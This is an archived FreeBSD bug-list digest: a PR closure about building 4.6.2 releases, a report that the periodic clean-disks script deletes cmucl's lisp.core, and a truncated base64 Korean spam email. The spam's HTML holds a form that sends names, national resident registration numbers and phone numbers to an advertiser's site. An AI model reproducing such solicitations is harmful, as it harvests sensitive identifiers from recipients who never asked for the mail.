Message-Id: <200208191157.g7JBvg5g096437@freefall.freebsd.org> To: chris@aims.com.au, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org, ru@FreeBSD.org Subject: Re: misc/41742: 4.6.2-RELEASE Release Building Failure Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: 4.6.2-RELEASE Release Building Failure State-Changed-From-To: open->closed State-Changed-By: ru State-Changed-When: Mon Aug 19 04:53:45 PDT 2002 State-Changed-Why: Sorry, but release/Makefile in RELENG_4_6 is too dumb to support building 4.6.2 on top of 4.6 with new share/mk API. Hence it's not supported: you can still build a custom release of 4.6.2 using the RELENG_4_6 populated world. Bruce A. Mah stumbled into this too while working on an official 4.6.2 release. Responsible-Changed-From-To: freebsd-bugs->ru Responsible-Changed-By: ru Responsible-Changed-When: Mon Aug 19 04:53:45 PDT 2002 Responsible-Changed-Why: http://www.freebsd.org/cgi/query-pr.cgi?pr=41742 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 5: 0:17 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C241F37B405 for ; Mon, 19 Aug 2002 05:00:12 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id EE5D943E7B for ; Mon, 19 Aug 2002 05:00:09 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JC09JU096890 for ; Mon, 19 Aug 2002 05:00:09 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JC09Ns096889; Mon, 19 Aug 2002 05:00:09 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F20AD37B407 for ; Mon, 19 Aug 2002 04:59:21 -0700 (PDT) Received: from router.darlow.co.uk (pc1-bigg1-2-cust101.ltn.cable.ntl.com [213.107.35.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0F06C43E77 for ; Mon, 19 Aug 2002 04:59:18 -0700 (PDT) (envelope-from neil@router.darlow.co.uk) Received: from router.darlow.co.uk (1001@localhost [127.0.0.1]) by router.darlow.co.uk (8.12.3/8.12.3) with ESMTP id g7JBlkjf037284 for ; Mon, 19 Aug 2002 12:47:49 +0100 (BST) (envelope-from neil@router.darlow.co.uk) Received: (from neil@localhost) by router.darlow.co.uk (8.12.3/8.12.3/Submit) id g7JBlkJA037283; Mon, 19 Aug 2002 12:47:46 +0100 (BST) (envelope-from neil) Message-Id: <200208191147.g7JBlkJA037283@router.darlow.co.uk> Date: Mon, 19 Aug 2002 12:47:46 +0100 (BST) From: Neil Darlow Reply-To: Neil Darlow To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/41777: /etc/periodic/daily/100.clean-disks removes lisp.core Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41777 >Category: bin >Synopsis: /etc/periodic/daily/100.clean-disks removes lisp.core >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Aug 19 05:00:03 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Neil Darlow >Release: FreeBSD 4.6.2-RELEASE i386 >Organization: Neil Darlow Consulting >Environment: System: FreeBSD router.darlow.co.uk 4.6.2-RELEASE FreeBSD 4.6.2-RELEASE #0: Wed Aug 14 18:33:55 BST 2002 root@router.darlow.co.uk:/usr/obj/usr/src/sys/ROUTER i386 >Description: The cmucl port contains a file /usr/local/lib/cmucl/lib/lisp.core which /etc/periodic/daily/100.clean-disks will remove. >How-To-Repeat: Install the port and enable 100.clean-disks. The file will be deleted after 3 days. >Fix: The file definitions for 100.clean-disks needs modification. Do you exclude .core files or restrict them somehow? >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 5:43:54 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2EE1037B401 for ; Mon, 19 Aug 2002 05:43:19 -0700 (PDT) Received: from relay5.kornet.net (relay5.kornet.net [211.48.62.165]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3306443E70 for ; Mon, 19 Aug 2002 05:43:17 -0700 (PDT) (envelope-from ggaggung07@kornet.net) Received: from you2-8qqrs7eqb3 (61.73.32.180) by relay5.kornet.net; 19 Aug 2002 21:43:15 +0900 Message-ID: <3d60e7e43d6d2295@relay5.kornet.net> (added by relay5.kornet.net) From: =?ks_c_5601-1987?B?x/a068SrteU=?= To: freebsd-bugs@FreeBSD.org Subject: =?ks_c_5601-1987?B?W7GksO1dIGZyZWVic2QtYnVnc7TUIMfgv+7AxyCz18DZIMWst8652b/NILq5scfAuyC15biztM+02SE=?= Date: Mon, 19 Aug 2002 20:51:06 +0900 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0207_01C0F51A.93A06C00" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0207_01C0F51A.93A06C00 Content-Type: text/plain; charset="ks_c_5601-1987" Content-Transfer-Encoding: base64 vcXDu7ytuN7Az8b7IA0KIA0KICAgDQogICAgICANCiANCiAgICAgCQkJICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICC8urjtICAJCSAgICAgwda5zrXut88gufjIoyAoIi0iwNS3 wikgDQogICAgICAgICAgICAgICAgICAgICAgICAgwffA5SDA/MitICAgICAgyN6068b5ICAN CiAgICAgICAgIA0KvcWx1CDIuL/4IL+syLi68SAguOnBpg0KIMf2tOsgwNq1v8L3ILG4wNS9 wyDG98DOxq4gx9LAziANCrG5s7vD1sPKIMHWwK8gurjH6Lmrt+EgsKHA1A0KIMGkuvEgwNq1 v8L3IL/rx7Agx9LAzg0KICAgICAgDQogIMf2tOsgIE0gxKu15Q0KICAgDQoNCiAgDQq9xbHU IMi4v/ggv6zIuLrxICC46cGmDQogseK+xiDA2rW/wvcgsbjA1L3DIMb3wM7GriDH0sDOIA0K sbmzu8PWw8ogwdbAryC6uMfouau34SCwocDUDQogwaS68SDA2rW/wvcgv+vHsCDH0sDODQog ICAgICAgseK+xiAgs+u67be5vboNCiAgIA0KDQogICANCsbyu/0gv6zIuLrxILjpwaYNCiDG 98DOxq6zs7rOLLD4sPqx3SDEq7XlsOHBpiC8rbrxvbogDQogx/a068GkwK8gp6QgtOcgNDC/ +CANCr+1yK0gv7m4xSDA5bTnIDIsMDAwv/ggx9LAziANCiAgICAgIA0KICBLVCAguvTHw7bz wNoNCiAgIA0KDQogIA0Ku+e/68fRIDAuNSW4piAgutK/7MDMv/S1vbHiDQogxvK7/SC/rMi4 uvEguOnBpiANCrHdwLa8rbrxvboNCiA1vu8guau34SC6uMfoIA0KDQoNCg0KICAgICAgILvn tvvAxyAgvNWw4cbsseINCiAgIA0KDQogICAgILHNx8/AxyAguN7Az8HWvNK0wiDApbytx87A uyDF68fYILz2wf3H0SCwzcDMuOcsILHXv9y/oSC+7rawx9EgwaS6uLW1ILCusO0gIMDWwfYg vsrAvcC7ILngyPy0z7TZLg0KICDAzCBFLW1haWzAuiC5373FwPy/68DMuOcsIL/4xKEgvsrA uL3HICCw5r/sIL7Gt6Egw6K/oSC43sDPwda80rimIMDUt8LHz7+pIMHWvcO46SC1ziC5+CC0 2b3DILjewM/AzCAgsKHB9iAgvsq1tbfPIMfPsNq9wLTPtNkuDQogICANCiAgICAgICAgICAg ICAgICAgICC6uyC43sDPwLogwaS6uMXrvcW6ziCxx7DtILvnx9e/oSDAx7DFIMGmuPG/oSBb saSw7V2287DtIMelvcO1yCCxpLDtILjewM/A1LTPtNkuDQogICAgICAgICAgICAgICAgICAg ICAgILn2xrDAuyDFrLivx8+9w7jpILz2vcWwxbrOw7O4rrChIMDMt+e+7iDB/bTPtNkuIA0K ICAgICAgICAgIElmIHlvdSB3b24ndCByZWNlaXZlIGFueSBtb3JlIG1haWwgYWJvdXQgdGhp cyBzaXRlLCANCiAgcHJlc3MgYnV0dG9uIGFuZCBmaWxsIHlvdXIgZS1tYWlsIGFkZHJlc3Mu IEFuZCB0aGVuIHdlIHdpbGwgbm90IHNlbmQgYW55IG1haWwgdG8geW91DQogICAgIA0KILq7 ILjewM/AuiDH9rTrxKu15byzsOi758DHICCws8DOIL+1vvcguN7Az8DUtM+02S4gILjewM+5 37zbwNogv6y29MOzIDogZW5leHRvcEBseWNvcy5jby5rciAgIA0KICANCiANCg== ------=_NextPart_000_0207_01C0F51A.93A06C00 Content-Type: text/html; charset="ks_c_5601-1987" Content-Transfer-Encoding: base64 PGh0bWw+DQoNCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iY29udGVudC10eXBlIiBjb250 ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9ZXVjLWtyIj4NCjx0aXRsZT69xcO7vK243sDPxvsg PC90aXRsZT4NCjxTQ1JJUFQgbGFuZ3VhZ2U9amF2YXNjcmlwdD4NCjwhLS0NCmZ1bmN0aW9u IGNsaWNrTW91c2UoKQ0KCXsNCgkgIA0KCQlpZiAoKGV2ZW50LmJ1dHRvbj09MikgfHwgKGV2 ZW50LmJ1dHRvbj09Mykpew0KCQkJcmV0dXJuIChmYWxzZSk7DQoJCX0JDQoJfQ0KCQ0KCWZ1 bmN0aW9uIGNsaWNrS2V5KCkNCgl7DQoJCWlmKChldmVudC5zaGlmdEtleSkgJiYgKGV2ZW50 LmtleUNvZGUgPT0gMTIxKSkNCgkJewkJDQoJCQlyZXR1cm4gZmFsc2U7DQoJCX0JDQoJfQ0K CQ0KCWZ1bmN0aW9uIG5vQWN0aW9uKCl7DQoJCXJldHVybiBmYWxzZTsNCgl9DQoNCmRvY3Vt ZW50Lm9ubW91c2Vkb3duPWNsaWNrTW91c2UNCmRvY3VtZW50Lm9ua2V5ZG93bj1jbGlja0tl eQ0KZG9jdW1lbnQub25jb250ZXh0bWVudT1ub0FjdGlvbg0KZG9jdW1lbnQub25kcmFnc3Rh cnQ9bm9BY3Rpb24NCmRvY3VtZW50Lm9uc2VsZWN0c3RhcnQ9bm9BY3Rpb24NCi8vLS0+DQo8 L3NjcmlwdD4NCjwvaGVhZD4NCg0KPGJvZHkgYmdjb2xvcj0id2hpdGUiIHRleHQ9ImJsYWNr IiBsaW5rPSJibHVlIiB2bGluaz0icHVycGxlIiBhbGluaz0icmVkIj4NCjxwPiZuYnNwOzwv cD4NCjx0YWJsZSBhbGlnbj0iY2VudGVyIiBib3JkZXI9IjEiIGNlbGxzcGFjaW5nPSIwIiB3 aWR0aD0iNjMyIiBib3JkZXJjb2xvcmRhcms9IndoaXRlIiBib3JkZXJjb2xvcmxpZ2h0PSJi bGFjayIgYmdjb2xvcj0id2hpdGUiPg0KICAgIDx0cj4NCiAgICAgICAgPHRkIHdpZHRoPSI5 NzQiPg0KICAgICAgICAgICAgPHAgYWxpZ249ImNlbnRlciI+PGltZyBzcmM9Imh0dHA6Ly9p eWVzY2FyZC5jb20vaW1nL3RpdGxlXzMuZ2lmIiB3aWR0aD0iNjMyIiBoZWlnaHQ9IjE3NCIg Ym9yZGVyPSIwIj48L3A+DQogICAgICAgIDwvdGQ+DQogICAgPC90cj4NCiAgICA8dHI+DQog ICAgICAgIDx0ZCB3aWR0aD0iOTc0Ij4NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgICAg IDxwPiZuYnNwOzxpbWcgc3JjPSJodHRwOi8vaXllc2NhcmQuY29tL2ltZy9ib3R0b202Lmdp ZiIgd2lkdGg9IjYyMyIgaGVpZ2h0PSIyMTEiIGJvcmRlcj0iMCI+PC9wPg0KICAgICAgICAg ICAgPC9mb3JtPg0KICAgICAgICA8L3RkPg0KICAgIDwvdHI+DQogICAgPHRyPg0KICAgICAg ICA8dGQgd2lkdGg9Ijk3NCI+IA0KCQkJPGZvcm0gbmFtZT0ibWFpbGZybTEiIGFjdGlvbj0i aHR0cDovL3d3dy5peWVzY2FyZC5jb20vbWFpbC9pbnNlcnQxLmFzcCIgbWV0aG9kPSJwb3N0 IiA+DQogICAgICAgICAgICAmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsm bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsm bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsm bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDs8Zm9udCBzaXplPSIy IiBjb2xvcj0iIzY2NjY2NiI+vLq47TwvZm9udD48Rk9OVCBzaXplPTI+ICANCiAgICAgICAg ICA8L0ZPTlQ+PGlucHV0IHR5cGU9InRleHQiIG5hbWU9Im5hbWUiIHNpemU9IjYiPg0KCQkg ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOzxmb250IHNpemU9IjIiIGNvbG9yPSIjNjY2NjY2 Ij7B1rnOte63zyC5+MijIDwvZm9udD48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0ianVtaW4i IHNpemU9IjE0IiBtYXhsZW5ndGg9IjE0Ij48Zm9udCBzaXplPSIyIiBmYWNlPSKxvLiyIiBj b2xvcj0iIzY2NjY2NiI+KCZxdW90Oy0mcXVvdDvA1LfCKTwvZm9udD48Zm9udCBjb2xvcj0i Izk5OTk5OSI+DQogICAgICAgICAgPC9mb250Pjxicj4gJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7PGZvbnQgc2l6ZT0iMiIgY29sb3I9IiM2NjY2NjYiPsH3 wOUgwPzIrSAgDQogICAgICAgICAgPC9mb250PjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ0 ZWxudW0iIHNpemU9IjEzIj4NCiAgICAgICAgICAmbmJzcDsmbmJzcDsmbmJzcDs8Zm9udCBz aXplPSIyIiBjb2xvcj0iIzY2NjY2NiI+yN6068b5IDwvZm9udD48Rk9OVCBzaXplPTI+PGlu cHV0IHR5cGU9InRleHQiIG5hbWU9ImhhbmRudW0iIHNpemU9IjE1Ij4NCiAgICAgICAgICA8 L0ZPTlQ+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iU3VibWl0MiIgdmFsdWU9Ir3Fw7si PjwvcD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDwvZm9ybT4NCiAgICAgICAgPC90ZD4N CiAgICA8L3RyPg0KICAgIDx0cj4NCiAgICAgICAgPHRkIHdpZHRoPSI5NzQiPjxUQUJMRSBi b3JkZXJDb2xvcj13aGl0ZSBjZWxsU3BhY2luZz0wIA0KICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICBib3JkZXJDb2xvckRhcms9d2hpdGUgY2VsbFBhZGRpbmc9MCB3aWR0aD0i NjIxIiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWxpZ249Y2VudGVyIGJv cmRlckNvbG9yTGlnaHQ9IzAwNjY5OSBib3JkZXI9MT4NCiAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgPFRCT0RZPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8 VFI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxURCB3aWR0aD0iMzI0Ij4N CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPFAgYWxpZ249bGVmdD48QlI+PElN RyBoZWlnaHQ9IjY2IiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3JjPSJo dHRwOi8vaXllc2NhcmQuY29tL2ltZy9jYXJkX2ltZ18yMC5naWYiIHdpZHRoPSIxMDUiIA0K ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhbGlnbj1sZWZ0IGJvcmRlcj0wPjxJ TUcgaGVpZ2h0PTcgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNyYz0iaHR0 cDovL2l5ZXNjYXJkLmNvbS9pbWcvYnVfMDEuZ2lmIiB3aWR0aD00IA0KICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICBib3JkZXI9MD4gPFNQQU4gc3R5bGU9IkZPTlQtU0laRTog OXB0Ij69xbHUIMi4v/ggv6zIuLrxIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICC46cGmPEJSPjxJTUcgaGVpZ2h0PTcgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgIHNyYz0iaHR0cDovL2l5ZXNjYXJkLmNvbS9pbWcvYnVfMDEuZ2lmIiB3aWR0aD00IA0K ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBib3JkZXI9MD4gx/a06yDA2rW/wvcg sbjA1L3DIMb3wM7GriDH0sDOIDxCUj48SU1HIGhlaWdodD03IA0KICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICBzcmM9Imh0dHA6Ly9peWVzY2FyZC5jb20vaW1nL2J1XzAxLmdp ZiIgd2lkdGg9NCANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYm9yZGVyPTA+ ILG5s7vD1sPKIMHWwK8gurjH6Lmrt+EgsKHA1DxCUj48SU1HIGhlaWdodD03IA0KICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICBzcmM9Imh0dHA6Ly9peWVzY2FyZC5jb20vaW1n L2J1XzAxLmdpZiIgd2lkdGg9NCANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg Ym9yZGVyPTA+IMGkuvEgwNq1v8L3IL/rx7Agx9LAzjwvU1BBTj48L1A+DQogICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgIDxESVYgYWxpZ249bGVmdD4NCiAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgPFRBQkxFIGNlbGxTcGFjaW5nPTAgY2VsbFBhZGRpbmc9MCBi b3JkZXI9MD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPFRCT0RZPg0KICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8VFI+DQogICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgIDxURCB3aWR0aD0xNTI+DQogICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgIDxQPiZuYnNwOyZuYnNwOzxTUEFOIA0KICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICBzdHlsZT0iRk9OVC1TSVpFOiA5cHQiPjxGT05UIGNvbG9yPSNjZDQ0MzM+PEI+ x/a06yANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSDEq7XlPC9CPjwvRk9O VD48L1NQQU4+PC9QPjwvVEQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxU RCB3aWR0aD0xNTI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxQIGFsaWdu PWxlZnQ+ICZuYnNwOzwvUD48L1REPjwvVFI+PC9UQk9EWT48L1RBQkxFPjwvRElWPjwvVEQ+ DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxURCB3aWR0aD0iMjkxIj4NCiAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPFAgYWxpZ249bGVmdD48QlI+PElNRyBo ZWlnaHQ9IjYzIiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3JjPSJodHRw Oi8vaXllc2NhcmQuY29tL2ltZy9jYXJkX2ltZ18yMS5naWYiIHdpZHRoPSI5OSIgDQogICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFsaWduPWxlZnQgYm9yZGVyPTA+PElNRyBo ZWlnaHQ9NyANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3JjPSJodHRwOi8v aXllc2NhcmQuY29tL2ltZy9idV8wMS5naWYiIHdpZHRoPTQgDQogICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgIGJvcmRlcj0wPiA8U1BBTiBzdHlsZT0iRk9OVC1TSVpFOiA5cHQi Pr3FsdQgyLi/+CC/rMi4uvEgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgILjp waY8QlI+PElNRyBoZWlnaHQ9NyANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg c3JjPSJodHRwOi8vaXllc2NhcmQuY29tL2ltZy9idV8wMS5naWYiIHdpZHRoPTQgDQogICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJvcmRlcj0wPiCx4r7GJm5ic3A7wNq1v8L3 ILG4wNS9wyDG98DOxq4gx9LAziA8QlI+PElNRyANCiAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgaGVpZ2h0PTcgc3JjPSLAzLnMwfYvYnVfMDEuZ2lmIiB3aWR0aD00IA0KICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBib3JkZXI9MD4gsbmzu8PWw8ogwdbAryC6 uMfouau34SCwocDUPEJSPjxJTUcgaGVpZ2h0PTcgDQogICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgIHNyYz0iaHR0cDovL2l5ZXNjYXJkLmNvbS9pbWcvYnVfMDEuZ2lmIiB3aWR0 aD00IA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBib3JkZXI9MD4gwaS68SDA 2rW/wvcgv+vHsCDH0sDOPC9TUEFOPjwvUD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgPERJViBhbGlnbj1sZWZ0Pg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICA8VEFCTEUgY2VsbFNwYWNpbmc9MCBjZWxsUGFkZGluZz0wIGJvcmRlcj0wPg0KICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICA8VEJPRFk+DQogICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgIDxUUj4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPFRE IHdpZHRoPTE0MT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPFAgYWxpZ249 bGVmdD48U1BBTiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3R5bGU9IkZP TlQtU0laRTogOXB0Ij48Rk9OVCBjb2xvcj0jY2Q0NDMzPjxCPiZuYnNwO7HivsYgDQogICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgILPruu23ub26PC9CPjwvRk9OVD48L1NQQU4+ PC9QPjwvVEQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxURCB3aWR0aD0x NDE+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxQIGFsaWduPWxlZnQ+ICZu YnNwOzwvUD48L1REPjwvVFI+PC9UQk9EWT48L1RBQkxFPjwvRElWPjwvVEQ+PC9UUj4NCiAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPFRSPg0KICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICA8VEQgd2lkdGg9IjMyNCI+DQogICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgIDxQIGFsaWduPWxlZnQ+PEJSPjxJTUcgaGVpZ2h0PSI3MiIgDQogICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgIHNyYz0iaHR0cDovL2l5ZXNjYXJkLmNvbS9pbWcv cGFydG5lcjE1X2NhcmRfaW1nLmpwZyIgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgIHdpZHRoPSIxMTMiIGFsaWduPWxlZnQgYm9yZGVyPTA+PElNRyBoZWlnaHQ9NyANCiAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3JjPSJodHRwOi8vaXllc2NhcmQuY29t L2ltZy9idV8wMS5naWYiIHdpZHRoPTQgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgIGJvcmRlcj0wPiA8U1BBTiBzdHlsZT0iRk9OVC1TSVpFOiA5cHQiPsbyu/0mbmJzcDu/ rMi4uvEguOnBpjxCUj48SU1HIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBo ZWlnaHQ9NyBzcmM9Imh0dHA6Ly9peWVzY2FyZC5jb20vaW1nL2J1XzAxLmdpZiIgd2lkdGg9 NCANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYm9yZGVyPTA+IMb3wM7GrrOz us4ssPiw+rHdIMSrteWw4cGmILytuvG9uiZuYnNwOzxCUj48SU1HIA0KICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICBoZWlnaHQ9NyBzcmM9Imh0dHA6Ly9peWVzY2FyZC5jb20v aW1nL2J1XzAxLmdpZiIgd2lkdGg9NCANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgYm9yZGVyPTA+IMf2tOvBpMCvIKekILTnIDQwv/ggPEJSPjxJTUcgaGVpZ2h0PTcgDQog ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNyYz0iaHR0cDovL2l5ZXNjYXJkLmNv bS9pbWcvYnVfMDEuZ2lmIiB3aWR0aD00IA0KICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICBib3JkZXI9MD4gv7XIrSC/ubjFIMDltOcgMiwwMDC/+CDH0sDOIDwvU1BBTj48L1A+ DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxESVYgYWxpZ249bGVmdD4NCiAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPFRBQkxFIGNlbGxTcGFjaW5nPTAgY2Vs bFBhZGRpbmc9MCBib3JkZXI9MD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg PFRCT0RZPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8VFI+DQogICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgIDxURCB3aWR0aD0xNTIgaGVpZ2h0PTE3Pg0KICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8UD4mbmJzcDsmbmJzcDs8U1BBTiANCiAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3R5bGU9IkZPTlQtU0laRTogOXB0Ij48 Rk9OVCBjb2xvcj0jY2Q0NDMzPjxCPktUIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICC69MfDtvPA2jwvQj48L0ZPTlQ+PC9TUEFOPjwvUD48L1REPg0KICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICA8VEQgd2lkdGg9MTUyIGhlaWdodD0xNz4NCiAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgPFAgYWxpZ249bGVmdD4gJm5ic3A7PC9QPjwvVEQ+ PC9UUj48L1RCT0RZPjwvVEFCTEU+PC9ESVY+PC9URD4NCiAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgPFREIHdpZHRoPSIyOTEiPg0KICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICA8UCBhbGlnbj1sZWZ0Pjxicj48SU1HIGhlaWdodD0iNjgiIA0KICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICBzcmM9Imh0dHA6Ly9peWVzY2FyZC5jb20vaW1nL2Nh cmRfaW1nXzExLmdpZiIgd2lkdGg9IjEwNiIgDQogICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgIGFsaWduPWxlZnQgYm9yZGVyPTA+PElNRyBoZWlnaHQ9NyANCiAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgc3JjPSJodHRwOi8vaXllc2NhcmQuY29tL2ltZy9idV8w MS5naWYiIHdpZHRoPTQgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJvcmRl cj0wPiA8U1BBTiBzdHlsZT0iRk9OVC1TSVpFOiA5cHQiPrvnv+vH0SAwLjUluKYgDQogICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgILrSv+zAzL/0tb2x4jxCUj48SU1HIGhlaWdo dD03IA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzcmM9Imh0dHA6Ly9peWVz Y2FyZC5jb20vaW1nL2J1XzAxLmdpZiIgd2lkdGg9NCANCiAgICAgICAgICAgICAgICAgICAg 